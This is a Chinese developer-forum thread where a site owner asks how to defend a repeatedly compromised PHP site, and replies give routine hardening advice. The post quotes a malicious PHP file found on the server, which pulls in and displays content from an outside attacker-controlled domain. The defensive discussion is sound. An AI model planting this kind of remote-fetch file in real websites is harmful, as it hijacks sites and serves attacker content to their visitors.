最近发现服务器一个站点总是被攻击，有很多恶意代码，有啥有效的防范方法吗？

问答 / 0 / 12 / 创建于 2年前

恶意文件源码

<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
echo file_get_contents("http://1.d986.top/");
?>

或者一句话木马

有没有啥好的办法：

防止上传恶意文件？；
防止扫描网站？
防止提取服务器权限？
等

服务器安全代码安全

课程读者 92 声望

暂无个人描述~

《L01 基础入门》

我们将带你从零开发一个项目并部署到线上，本课程教授 Web 开发中专业、实用的技能，如 Git 工作流、Laravel Mix 前端工作流等。

《G01 Go 实战入门》

从零开始带你一步步开发一个 Go 博客项目，让你在最短的时间内学会使用 Go 进行编码。项目结构很大程度上参考了 Laravel。

讨论数量: 12

Dash007

课程读者 76 声望

不给写入权限

2年前评论

巴啦啦

课程读者 206 声望 / 宇宙游民 @ 地球村

找到漏洞在哪里并补上，重置服务器，安装防护软件。

2年前评论

eanBear

7 声望

不给写权限
查请求日志，看入口在哪，如果是开源的代码尽量升级到最新版
查数据库有没有被加了管理员
换干净的系统重新部署，装防护软件

2年前评论

liaosp

课程读者 444 声望

大部分PHP程序员，都搞不懂如何安全代码部署

2年前评论

raybon

Laravel 8.x 译者 392 声望 / php @ 远程

安装防护软件，修改常用防火墙端口限制，限制ssh 端口连接

2年前评论

是阿东啊

课程读者 66 声望

上面该说的都说的差不多了，花点钱又省事的办法就是上web防火墙，脚本小子都能轻松搞定

2年前评论

hongfs

课程读者 43 声望

或者试一下最近挺火的，长亭雷池

2年前评论

liushuo

0 声望

看日志，有没有代码漏洞

2年前评论

laravelphp_game

课程读者 15 声望

mark

2年前评论

半人间

课程读者 186 声望

把服务器关掉

2年前评论

tomcath

Laravel 9.x 译者 194 声望

本来想看看木马长啥样，结果进不去，你们能进吗？

2年前评论

C_K

见习版主 6 声望

欢迎攻击

2年前评论

讨论应以学习和精进为目的。请勿发布不友善或者负能量的内容，与人为善，比聪明更重要！

帮助